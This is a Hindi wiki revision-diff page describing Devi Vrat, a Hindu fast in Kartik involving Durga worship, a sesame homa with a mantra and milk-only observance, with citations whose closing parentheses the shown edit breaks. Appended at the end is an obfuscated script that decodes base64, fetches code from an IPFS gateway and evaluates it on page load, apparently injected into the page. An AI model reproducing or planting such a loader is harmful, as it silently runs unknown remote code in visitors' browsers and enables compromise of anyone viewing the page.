Difference between revisions of "देवी व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
Line 4: Line 4:
 
*इसमें देवी [[दुर्गा]] की पूजा की जाती है।  
 
*इसमें देवी [[दुर्गा]] की पूजा की जाती है।  
 
*तिल से होम किया जाता है,- 'जयन्ती मंगला काली भदकाली कपालिनी। दुर्गा क्षमा धात्री स्वधा स्वाहा नमोस्तु ते।।' मन्त्र के साथ में जाप किया जाता है।
 
*तिल से होम किया जाता है,- 'जयन्ती मंगला काली भदकाली कपालिनी। दुर्गा क्षमा धात्री स्वधा स्वाहा नमोस्तु ते।।' मन्त्र के साथ में जाप किया जाता है।
*इससे सभी पापों, रोगों एवं भयों से मुक्ति हो जाती है।<ref>हेमाद्रि (व्रतखण्ड 775-776)</ref>  
+
*इससे सभी पापों, रोगों एवं भयों से मुक्ति हो जाती है।<ref>हेमाद्रि (व्रतखण्ड 775-776</ref>  
 
*प्रकीर्णक व्रत, गौरी एवं शम्भु, जनार्दन एवं [[लक्ष्मी]] तथा [[सूर्य]] एवं उसकी पत्नी छाया की मूर्तियों की पूजा की जाती है।  
 
*प्रकीर्णक व्रत, गौरी एवं शम्भु, जनार्दन एवं [[लक्ष्मी]] तथा [[सूर्य]] एवं उसकी पत्नी छाया की मूर्तियों की पूजा की जाती है।  
 
*श्वेत पुष्पों से सम्मान देने के उपरान्त धूप, घण्टी एवं दीप का दान किया जाता है।
 
*श्वेत पुष्पों से सम्मान देने के उपरान्त धूप, घण्टी एवं दीप का दान किया जाता है।
*इससे दिव्य रूप प्राप्त होता है।<ref>हेमाद्रि (व्रतखण्ड 2, 884)</ref>  
+
*इससे दिव्य रूप प्राप्त होता है।<ref>हेमाद्रि (व्रतखण्ड 2, 884</ref>  
*किसी भी मास की पूर्णिमा पर, कर्ता केवल दूध पर रहता है तथा गोदान करने से लक्ष्मी के लोक में पहुँचता है।<ref>हेमाद्रि (व्रतखण्ड 2, 239); कृत्यकल्पतरु (447-448)</ref>
+
*किसी भी मास की पूर्णिमा पर, कर्ता केवल दूध पर रहता है तथा गोदान करने से लक्ष्मी के लोक में पहुँचता है।<ref>हेमाद्रि (व्रतखण्ड 2, 239); कृत्यकल्पतरु (447-448</ref>
 
{{प्रचार}}
 
{{प्रचार}}
 
{{संदर्भ ग्रंथ}}
 
{{संदर्भ ग्रंथ}}

Latest revision as of 12:50, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat kartik mean hota hai.
  • karta keval doodh evan ratri mean shak sabji matr khata hai.
  • isamean devi durga ki pooja ki jati hai.
  • til se hom kiya jata hai,- 'jayanti mangala kali bhadakali kapalini. durga kshama dhatri svadha svaha namostu te..' mantr ke sath mean jap kiya jata hai.
  • isase sabhi papoan, rogoan evan bhayoan se mukti ho jati hai.[1]
  • prakirnak vrat, gauri evan shambhu, janardan evan lakshmi tatha soory evan usaki patni chhaya ki moortiyoan ki pooja ki jati hai.
  • shvet pushpoan se samman dene ke uparant dhoop, ghanti evan dip ka dan kiya jata hai.
  • isase divy roop prapt hota hai.[2]
  • kisi bhi mas ki poornima par, karta keval doodh par rahata hai tatha godan karane se lakshmi ke lok mean pahuanchata hai.[3]


tika tippani aur sandarbh

  1. hemadri (vratakhand 775-776
  2. hemadri (vratakhand 2, 884
  3. hemadri (vratakhand 2, 239); krityakalpataru (447-448

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>